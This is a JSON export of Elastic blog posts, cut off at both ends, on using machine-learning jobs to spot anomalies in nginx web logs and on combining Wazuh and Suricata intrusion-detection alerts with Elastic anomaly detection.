organisation.\n\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2019-04-01T13:53:56.355Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"title":"swiss-army-knife-outlines-full.jpg","uid":"blt48ef68dff8a8036a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T08:12:50.032Z","updated_at":"2019-01-05T08:12:50.032Z","content_type":"image/jpeg","file_size":"110651","filename":"swiss-army-knife-outlines-full.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-02T07:14:41.735Z","user":"blt65548c2606a134b2"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt48ef68dff8a8036a/5c30670225a401fc6fe4f52b/swiss-army-knife-outlines-full.jpg"},"markdown_l10n":"","publish_date":"2018-05-03T14:48:57.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","canonical_tag":""},"tags":["lukewarm"],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"swiss-army-knife-outlines-thumb.jpg","uid":"blte1adb4cf66da3569","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T08:12:53.742Z","updated_at":"2019-01-05T08:12:53.742Z","content_type":"image/jpeg","file_size":"67487","filename":"swiss-army-knife-outlines-thumb.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-02T07:14:41.735Z","user":"blt65548c2606a134b2"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte1adb4cf66da3569/5c306705c3c5fd7f678c1617/swiss-army-knife-outlines-thumb.jpg"},"title":"Using the Elastic Stack as a SaaS-Based Security Operations Swiss Army Knife","title_l10n":"Using the Elastic Stack as a SaaS-Based Security Operations Swiss Army Knife","updated_at":"2024-10-09T18:02:42.277Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/using-the-elastic-stack-as-a-saas-based-security-operations-swiss-army-knife","publish_details":{"time":"2024-10-09T18:03:04.984Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf04d0ce7141d3a0f","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt8414a102667f2207"],"body_l10n":"","callout":[],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:21:50.719Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf7e0361d38ceea67"],"full_bleed_image":{"title":"ml-and-nginx-website-logs-fullbleed.jpg","uid":"blt9f1b26d3870082df","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T09:36:18.630Z","updated_at":"2019-01-05T09:36:18.630Z","content_type":"image/jpeg","file_size":"31363","filename":"ml-and-nginx-website-logs-fullbleed.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T21:26:15.252Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9f1b26d3870082df/5c307a92ebb7714d660271c2/ml-and-nginx-website-logs-fullbleed.jpg"},"markdown_l10n":"Getting insight from nginx log files can be complicated. This blog shows how machine learning can be used to automatically extract operational insights from large volumes of nginx log data.\n\n## Overview\n\nData science can be a complicated, experimental process where it is easy to [get lost in the data](https://en.wikipedia.org/wiki/The_Magical_Number_Seven,_Plus_or_Minus_Two), or the [counter-intuitiveness of statistics](https://web.archive.org/web/20140413131827/http://www.decisionsciences.org/DecisionLine/Vol30/30_1/vazs30_1.pdf). Therefore, a key design goal for the Machine Learning group at Elastic is to develop tools that empower a wide spectrum of users to get insight out of Elasticsearch data.\n\nThis lead to us to develop features such as \"[Single Metric Job](https://www.elastic.co/videos/machine-learning-tutorial-creating-a-single-metric-job)\" and \"[Multiple Metric Job](https://www.elastic.co/videos/machine-learning-tutorial-creating-a-multi-metric-job)\" wizards in X-Pack Machine Learning, and we are planning to simplify analysis and configuration steps even more in upcoming releases. \n\nIn parallel to these wizards, we are also planning to shrink-wrap job configurations on known Beats and Logstash data sources. For example, if you are collecting data with the [Filebeat NGINX module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-nginx.html), we can provide a set of shrink-wrapped configurations and dashboards to help users apply machine learning to their data. These configurations are also aimed at showing how we develop Machine Learning configurations internally based on our experience. \n\nThe details of how to install these configurations will be covered in a subsequent blog. This blog is aimed at describing the use cases and configurations.\n\n## Use Case Notes\n\nThe configuration options for X-Pack Machine Learning are extensive, and often new users are tempted to start with complex configurations and select large numbers of attributes and series. These types of configurations can be very powerful and expressive, but require care as the results can be difficult to interpret. We therefore recommend that users start with simple, well-defined use cases, and build out complexity as they become more familiar with the system. (Note, often the best initial use cases come from automating anomaly detection on charts on the Operations teams core dashboards.)\n\n### Example Data Description\n\nThe data used in these examples is from a production system consisting of 4 load balanced nginx web servers. We analysed 3 months data (~29,000,000 events, ~1,100,000 unique visitors, ~29GB data). Note, the data shown here has been anonymised.\n\nnginx [log format](http://nginx.org/en/docs/http/ngx_http_log_module.html#log_format):\n\n '\"$http_x_forwarded_for\" $remote_addr - [$time_local] \"$request\" $status $body_bytes_sent \"$http_referer\" \"$http_user_agent\"';\n \n\nSample log message:\n\n \"2021:0eb8:86a3:1000:0000:9b3e:0370:7334 10.225.192.17 10.2.2.121\" - - [30/Dec/2016:06:47:09 +0000] \"GET /test.html HTTP/1.1\" 404 8571 \"-\" \"Mozilla/5.0 (compatible; Facebot 1.0; https://developers.facebook.com/docs/sharing/webmasters/crawler)\"\n \n\nOnce processed by Filebeat's NGINX module configuration, we get the following JSON document in Elasticsearch:\n\n ... { \"nginx\" : { \"access\" : { \"referrer\" : \"-\", \"response_code\" : \"404\", \"remote_ip\" : \"2021:0eb8:86a3:1000:0000:9b3e:0370:7334\", \"geoip\" : { \"continent_name\" : \"Europe\", \"country_iso_code\" : \"PT\", \"location\" : { \"lon\" : -10.23057, \"lat\" : 34.7245 } }, \"method\" : \"GET\", \"user_name\" : \"-\", \"http_version\" : \"1.1\", \"body_sent\" : { \"bytes\" : \"8571\" }, \"remote_ip_list\" : [ \"2021:0eb8:86a3:1000:0000:9b3e:0370:7334\", \"10.225.192.17\", \"10.2.2.121\" ], \"url\" : \"/test.html\", \"user_agent\" : { \"major\" : \"1\", \"minor\" : \"0\", \"os\" : \"Other\", \"name\" : \"Facebot\", \"os_name\" : \"Other\", \"device\" : \"Spider\" } } } }...\n \n\n## Use Case 1: Changes in Website Visitors\n\nOperationally, system issues are often reflected in changes in visitor rate. For example, if the visitor rate declines significantly in a short period of time, it is likely that there is a system issue with the site. Simple ways to understand changes in visitor rate are to analyse overall event rate, or the rate number of distinct visitors.\n\n### Job 1.1: Low Count of Website Visitors\n\nThis job can simply be configured using the 'Single Metric Job' wizard:\n\n\nJob configuration summary:\n\n\n\nThis analysis shows a significant anomaly on February 27th where the total event rate drops significantly:\n\n\n\n(Note this analysis of the 29,000,000 events took a total of 16s on a m4.large AWS instance)\n\n### Job 1.2: Low Count of Unique Website Visitors\n\nEvent counts can be strongly influenced by bots or attackers, and so a more consistent feature to analyse the number of unique website visitors. Again this can simply be configured using the 'Single Metric Job' wizard:\n\n\n\nAgain there is a significant anomaly on February 27th where the number of unique visitors per 15m drops from a typical 1487 to 86:\n\n\n\n### Combining Job 1.1 and 1.2:\n\nUsing the [Anomaly Explorer](https://www.elastic.co/guide/en/x-pack/5.4/ml-gs-jobresults.html) the results from both jobs can be temporary correlated to give an 'Overall' view into the anomalousness of the system based on these features:\n\n\n\nThis clearly shows in a single view, that there was a significant anomaly on February 27th between 10:00-12:00 where the total event rate dropped, and the number of unique visitors dropped. \n\nThe operations team confirmed the site had significant issues at this time due to a prior configuration change in the CDN. Unfortunately, they didn't detect the user impact until 11:30 (due to internal users on Slack complaining), whereas with ML they would have been alerted at 10:00 when the issue occurred.\n\nThis analysis can be combined with [alerting](https://www.elastic.co/blog/alerting-on-machine-learning-jobs-in-elasticsearch-v55) to give operations teams early insights into changes in system behaviour.\n\n## Use Case 2: Changes in Website Behaviour\n\nOnce simple behaviours are analysed, next steps are often to analyse more complex features. For example, changes in event rates of the different [HTTP status codes](https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html) returned by the webserver can often indicate changes in system behaviour or unusual clients:\n\n\n\nThis use case is more complex as it involves analysing multiple series concurrently, but it can again be simply configured using the \"[Multiple Metric Job](http://www.elastic.co/videos/machine-learning-tutorial-creating-a-multi-metric-job)\" wizard:\n\n\n\nResults show some significant changes in the different response codes:\n\n\n\nIn particular, again on February 27th there is a significant change in behaviour of response_code 404, 301, 306 and 200. Zooming in on 404s show some significant anomalies:\n\n\n\nThe first highlighted anomaly is attributed to a specific IP address as nginx.access.remote_ip is defined as an influencer (more on this in a later blog). The second highlighted anomaly represents a significant overall change in 404 behaviour. \n\nThe increase in 404s on February 27th was again a new insight for the operations team, and represented a large number of dead links that had been introduced by the configuration change.\n\n## Use Case 3: Unusual Clients\n\nWebsite traffic generally consists of a combination of normal usage, scanning by bots and attempted malicious activity. Assuming the majority of clients are normal, we can use [population analysis](https://www.elastic.co/guide/en/x-pack/current/ml-configuring-pop.html) to detect significant attacks or bot activity.\n\nThe number of pages a normal user requests in a 5-minute window can be limited by how fast they can manually click website pages. Automated processes can scan 1000s of pages a minute, and attackers can simply flood a site with requests.\n\nThere are a number of [features](https://en.wikipedia.org/wiki/Feature_(machine_learning)) we could use to differentiate traffic types, but in the first instance, event rate and number of distinct URL rate by a client can highlight unusual client activity.\n\nIn this case, [advanced job configuration](https://www.elastic.co/videos/machine-learning-lab-3-detect-outliers-in-a-population) is used to configure 2 population jobs:\n\n\n\n### Job 3.1: Detect unusual remote_ips - high request rates\n\nLooking at unusually high event rate for a client (nginx*access*remote*ip*high_count) we get:\n\n\n\nThis shows a number of anomalous clients. For example, 185.78.31.85 seems to be anomalous over a long time period:\n\n\n\nDrilling into a dashboard that summarises this interaction:\n\n\n\nThis shows that this IP address has repeatedly hit the root URL (/) an unusually large number of times in a short time period, and that this behaviour continues for several days.\n\n### Job 3.2: Detect unusual remote_ips - high request rates\n\nLooking at unusually high distinct count of URL rate for a client (nginx*access*remote*ip*high*dc*url) we get:\n\n\n\nAgain, this shows a number of unusual clients. Drilling into 72.57.0.53 shows a client accessing \u003e 12000 distinct URLs in a short period. \n\n\n\nDrilling into a dashboard that summarises this interaction:\n\nThis shows this client is attempting a large number of unusual URLs consistent with [path traversal](https://www.owasp.org/index.php/Path_Traversal) types of attack.\n\n\n\nBoth these jobs provide real-time visibility into unusual clients accessing a website. Web traffic is often skewed by bots and attackers, and differentiating these clients can help administrators understand behaviours such as:\n\n- What types of attack the site is subjected to \n- Whether bots are successful accessing the entire site \n- What 'normal' usage is\n\n## Summary\n\nThis blog attempts to show how X-Pack ML can provide insights into website behaviour. In upcoming Elastic Stack releases these types of configurations and dashboards will be available to end users as easily installed packages. This should empower users with proven tested configurations and also show users recommended types of configurations to copy and extend.","publish_date":"2017-09-26T21:20:13.000Z","seo":{"seo_title_l10n":"","seo_description_l10n":"","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"ml-and-nginx-website-logs-fullbleed.jpg","uid":"blt9f1b26d3870082df","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T09:36:18.630Z","updated_at":"2019-01-05T09:36:18.630Z","content_type":"image/jpeg","file_size":"31363","filename":"ml-and-nginx-website-logs-fullbleed.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-02T21:26:15.252Z","user":"blt3e52848e0cb3c394"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9f1b26d3870082df/5c307a92ebb7714d660271c2/ml-and-nginx-website-logs-fullbleed.jpg"},"title":"Machine Learning for Nginx Logs - Identifying Operational Issues with Your Website","title_l10n":"Machine Learning for Nginx Logs - Identifying Operational Issues with Your Website","updated_at":"2024-10-07T20:17:54.751Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/machine-learning-for-nginx-logs","publish_details":{"time":"2024-10-07T20:17:59.952Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt45715f7a115c2959","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["bltc1e73e181ab0ed53","blt0dbe04e5acc0f969"],"body_l10n":"\u003cp\u003eThe \u003ca href=\"https://www.elastic.co/products\"\u003eElastic Stack\u003c/a\u003e delivers security analytics capabilities that are widely used for threat detection, visibility, and incident response. The speed and scale at which Elasticsearch can index and search security-related information enable security analysts to work more efficiently, while Kibana dashboards provide wide visibility and enable interactive threat hunting. And the \u003ca href=\"https://www.elastic.co/products/stack/machine-learning\"\u003emachine learning\u003c/a\u003e engine can automate the analysis of complex datasets, making it possible to spot intruders that otherwise would’ve gone unnoticed.\u003c/p\u003e\u003cp\u003ePopular Intrusion Detection Systems (IDS), such as \u003ca href=\"https://wazuh.com/\"\u003eWazuh\u003c/a\u003e or Suricata, use a signature-based approach to threat detection. That is, they compare patterns found in files, logs, and network traffic against a database of patterns known to be associated with malicious activity, alerting when a match is found. They provide useful rulesets to analyze and correlate data, usually generating thousands or millions of alerts per day in a production environment.\u003c/p\u003e\u003cp\u003eCasting a wide net can ensure that all potential security events are caught, but it also adds the work of sifting through thousands (or millions) of alerts every day. Elastic machine learning features help reduce the noise by automatically identifying unusual behaviors. This is a clear use case where anomaly-based and signature-based technologies complement each other, making threat detection easier and investigations more efficient.\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://github.com/wazuh/wazuh\"\u003eWazuh\u003c/a\u003e, commonly deployed along with the Elastic Stack, is an open source host-based intrusion detection system (HIDS). It provides log analysis, file integrity monitoring, rootkit and vulnerability detection, configuration assessment and incident response capabilities. The Wazuh solution architecture is based on multi-platform lightweight agents that run on monitored systems, reporting to a centralized server where data analysis is done. In addition, it provides a complete Kibana plugin for configuration management, status monitoring, querying and alert data visualization.\u003c/p\u003e\u003cp\u003eOn the other hand, \u003ca href=\"https://suricata-ids.org/\"\u003eSuricata\u003c/a\u003e is a free and open source network threat detection engine, capable of real time network intrusion detection (NIDS), inline intrusion prevention (NIPS), network security monitoring (NSM), and offline pcap processing. Suricata inspects the network traffic using its rules and signature language to match known threats, policy violations and malicious behaviors, and supports scripting for detection of complex threats.\u003c/p\u003e\u003cp\u003eIn this blog post, we will provide an overview of how to detect intrusions using an integration of Wazuh and Suricata in combination with Elastic machine learning jobs to help prioritize investigations.\u003c/p\u003e\u003ch2\u003eIntegrating Wazuh, Suricata, and the Elastic Stack\u003c/h2\u003e\u003cp\u003eFor the purpose of this blog post, we have set up a lab environment where Wazuh agents have been deployed to several Internet-facing servers, monitoring system and application log data, file integrity, and system calls.\u003c/p\u003e\u003cp\u003eIn addition, we are running a Suricata sensor that takes care of monitoring the network traffic. This sensor is often configured to monitor traffic via a network tap, mirroring port, or a SPAN (Switched Port Analyzer) port, but can also can be deployed directly to your servers.\u003c/p\u003e\u003cp\u003eIn order to get the most out of these two tools, we decided to analyze Suricata alerts using Wazuh rules, unifying the alerts format and allowing us to do correlation (for example with threat intelligence sources) and trigger automatic responses.\u003c/p\u003e\u003cp\u003eThis integration was done by configuring a Wazuh agent to read Suricata JSON output. This agent acts as a collector that forwards the Suricata NIDS alerts to the Wazuh server, where they are processed through Wazuh log analysis rules, resulting in new and enriched security events.\u003c/p\u003e\u003cp\u003eNow, as result of this work, both NIDS and HIDS alerts are sent to Elasticsearch via Filebeat (configured to read Wazuh alerts) and Logstash (also used for geolocation enrichment), where we will use machine learning jobs to detect anomalies and unusual behaviors.\u003c/p\u003e\u003cp\u003eBelow is an example of a deployment of host-based and network-based IDS technologies, integrated together with Elastic Stack:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt69bd38c77bdaac5e/5c583b764651cff70b650fc7/wazuh.png\" data-sys-asset-uid=\"blt69bd38c77bdaac5e\" alt=\"Security analytics with the Elastic Stack and Wazuh\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch2\u003eDetecting Malicious Actors using Machine Learning Jobs\u003c/h2\u003e\u003cp\u003eIn our lab environment, we enabled all rules, and found out that, for just one of our Internet-facing web servers, our Wazuh agent is reporting somewhere from 4 to 10 thousand IDS alerts per day. They are mostly related to web attacks, authentication failures, configuration issues (detected using hardening checks), file integrity changes, or vulnerable software.\u003c/p\u003e\u003cp\u003eTo make it easier for the security analysts, Wazuh IDS alerts are enriched with metadata, such as a \u003ca href=\"https://documentation.wazuh.com/3.x/user-manual/manager/alert-threshold.html\"\u003elevel value\u003c/a\u003e or \u003ca href=\"https://documentation.wazuh.com/3.x/user-manual/agents/grouping-agents.html\"\u003egroup\u003c/a\u003e, making it possible to filter by priority or type. In addition, the Wazuh Kibana plugin provides pre-configured dashboards with useful information regarding the agent status, configuration, and alerts. See screenshot below:\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaeded6e5f42e8008/5c583b6f713ebdec0ba0724b/wazuh_1.jpg\" data-sys-asset-uid=\"bltaeded6e5f42e8008\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eThe information provided by Wazuh is certainly useful, but it still does not tell us about unusual behaviors. Here is where an Elastic machine learning job can help us.\u003c/p\u003e\u003cp\u003eElastic machine learning allows us to create several type of “jobs.” The job is the basic element of machine learning analysis. In our case, we decided to create what is known as a “population analysis,” where we instructed the machine learning engine to build a baseline model of IP address typical behavior over a period of time, identifying the ones that are behaving abnormally compared to the rest of population.\u003c/p\u003e\u003cp\u003eMore specifically, in our case we wanted to look for source IP addresses that, when compared to all other IP addresses, are responsible for an unusually high number of alert types. This can’t be done just by creating aggregation tables, as the anomalies occurred at a certain point in time, not known by our security analyst, and we have over 60 days of alert data (we detected some attacks for which their duration was no more than two minutes).\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5f3853bf1907d6b8/5c583b698c741b010cbf6cf2/wazuh_2.png\" data-sys-asset-uid=\"blt5f3853bf1907d6b8\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eAs a result of our population analysis, we spot several abnormal behaviors (in the form of a list of source IP addresses), which we decided to investigate. We used the “Anomaly Explorer” to learn when each one of those possible malicious actors were attacking our environment.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc441190af1573bef/5c583b644651cff70b650fc1/wazuh_3.png\" data-sys-asset-uid=\"bltc441190af1573bef\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003ch2\u003eInvestigating an Intrusion Attempt\u003c/h2\u003e\u003cp\u003eAs an example of a security analysis, we highlight the investigation of one of the IP addresses identified by the machine learning job. This particular IP address generated several NIDS and HIDS alerts in less than a minute, triggering an automated Wazuh action that blocked the IP address in the local firewall of our web server.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9943893542e7e7f3/5c583b5edfaabbd40b9c2c0c/wazuh_4.jpg\" data-sys-asset-uid=\"blt9943893542e7e7f3\" style=\"display: block;margin: auto;\"/\u003e\u003c/p\u003e\u003cp\u003eAs shown in the screenshot above, Suricata NIDS detected malicious traffic from the indicated source IP address. Four rules matched incoming traffic, generating the following alerts:\u003c/p\u003e\u003cul\u003e\u003cli\u003eET DROP Dshield Block Listed Source group 1\u003c/li\u003e\u003cli\u003eET CINS Active Threat Intelligence Poor Reputation IP group 77\u003c/li\u003e\u003cli\u003eSURICATA HTTP URI terminated by non-compliant character\u003c/li\u003e\u003cli\u003eSURICATA HTTP METHOD terminated by non-compliant character\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThe first two rules, part of \u003ca href=\"http://doc.emergingthreats.net/\"\u003eEmerging Threats\u003c/a\u003e ruleset, indicate that the source IP address is known to have a poor reputation according to Threat Intelligence (TI) sources: \u003ca href=\"https://www.dshield.org/\"\u003eDshield\u003c/a\u003e and Active Threat Intelligence.\u003c/p\u003e\u003cp\u003eIn addition, two other signatures detected anomalous HTTP activity coming from the same source IP address, most likely part of a scanning phase where the attacker gathers information looking for potential vulnerabilities.\u003c/p\u003e\u003cp\u003eThe Wazuh HIDS component also triggered different alerts based on the analysis of the web server access logs. This approach, totally different from network packet inspection, ended up generating the following alerts:\u003c/p\u003e\u003cul\u003e\u003cli\u003eIP address found in AlienVault reputation database\u003c/li\u003e\u003cli\u003eHost Blocked by firewall-drop.sh Active Response\u003c/li\u003e\u003cli\u003eHost Unblocked by firewall-drop.sh Active Response\u003c/li\u003e\u003c/ul\u003e\u003cp\u003eThe first alert indicates that the source IP address is also known to be part of yet another Threat Intelligence (TI) source: \u003ca href=\"https://otx.alienvault.com/\"\u003eAlienVault OTX\u003c/a\u003e IP reputation database.\u003c/p\u003e\u003cp\u003eThe second two alerts are triggered by the Wazuh Active Response module that, as result of the previously mentioned alerts, automatically added a firewall rule to block traffic from that particular source IP address for exactly 60 seconds (this is configurable). This action was enough to block scanning activities and caused the malicious actor desist from the intrusion attempt.\u003c/p\u003e\u003ch2\u003eConclusion\u003c/h2\u003e\u003cp\u003eEmploying both signature-based and anomaly-based intrusion detection, using technologies such as Wazuh, Suricata and Elastic machine learning, can make threat detection easier and investigations more efficient.\u003c/p\u003e\u003cp\u003eIn addition, integrating host-based IDS (used to monitor systems at a host level) with network-based IDS (used to inspect network traffic) can also increase threat detection and security visibility. Wazuh makes this easy, as it can be used to integrate host and network IDS systems with the Elastic Stack, and can provide mechanism to run automated responses and block attacks in real-time.\u003c/p\u003e\u003cspan\u003e\u003c/span\u003e","callout":[],"category":[{"uid":"bltb79594af7c5b4199","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:05.640Z","created_by":"blt3044324473ef223b70bc674c","key":"product","label_l10n":"Product","tags":[],"title":"Product","updated_at":"2024-05-10T13:44:20.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.527Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:28:10.603Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"title":"ML_IDS_2000x415a.jpg","uid":"blt6ad8aa0314b72e0a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:32:18.797Z","updated_at":"2019-01-05T06:32:18.797Z","content_type":"image/jpeg","file_size":"135392","filename":"ML_IDS_2000x415a.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T20:04:36.140Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6ad8aa0314b72e0a/5c304f72b7017c456eff09a7/ML_IDS_2000x415a.jpg"},"markdown_l10n":"","publish_date":"2018-10-23T19:00:00.000Z","seo":{"seo_title_l10n":"Improve Security Analytics with the Elastic Stack, Wazuh, and IDS","seo_description_l10n":"Using Wazuh signature-based HIDS and Elastic machine learning can make cyber threat detection easier and investigations more efficient.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"title":"Threat hunting","label_l10n":"Threat hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}},{"title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"title":"Blog.jpg","uid":"blte4da8d47cd73cc67","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T06:32:23.067Z","updated_at":"2019-01-05T06:32:23.067Z","content_type":"image/jpeg","file_size":"162979","filename":"Blog.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T20:04:36.140Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte4da8d47cd73cc67/5c304f77aab458d30b314216/Blog.jpg"},"title":"Improve Security Analytics with the Elastic Stack, Wazuh, and IDS","title_l10n":"Improve Security Analytics with the Elastic Stack, Wazuh, and IDS","updated_at":"2024-10-07T13:28:36.580Z","updated_by":"blt8288fbcbd8c9dce4","url":"/blog/improve-security-analytics-with-the-elastic-stack-wazuh-and-ids","publish_details":{"time":"2024-10-07T13:28:42.311Z","user":"blt8288fbcbd8c9dce4","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta2fdfd8ac200a0ba","_version":29,"locale":"en-us","ACL":{},"abstract_l10n":"With free and open Elastic SIEM, Elastic continues its mission to help organizations improve their security posture. Eliminate blind spots and arm analysts with the tools and workflows they need to protect data and infrastructure.","author":["bltf23616cb2a002415"],"body_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHave you heard the news?\u0026nbsp;\u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elasticsearch-is-open-source-again\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch is open source, again.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003chr/\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003eSecurity teams must protect attack surfaces that are becoming bigger and more distributed due to the growth of remote work, cloud infrastructure, and other dynamics. These teams understand that meeting this challenge at scale requires the successful incorporation of the appropriate technology into their security operations program. While \u003ca href=\"https://www.elastic.co/what-is/siem\" target=\"_self\"\u003esecurity information and event management (SIEM) solutions\u003c/a\u003e are designed to help analysts detect and respond to potential security threats, there are fundamental limitations with many widely deployed SIEM solutions that often hamstring analysts.\u003c/p\u003e\u003cp\u003eSecuring your organization against cyber threats is tough enough in normal times. Unfortunately, during challenging times, the threat landscape gets even more treacherous. Regional, national, or global events, such as elections, major sporting events, or even a global health crisis can exacerbate the challenge. The greater adoption of wide scale telecommuting carries its own risks — with workers 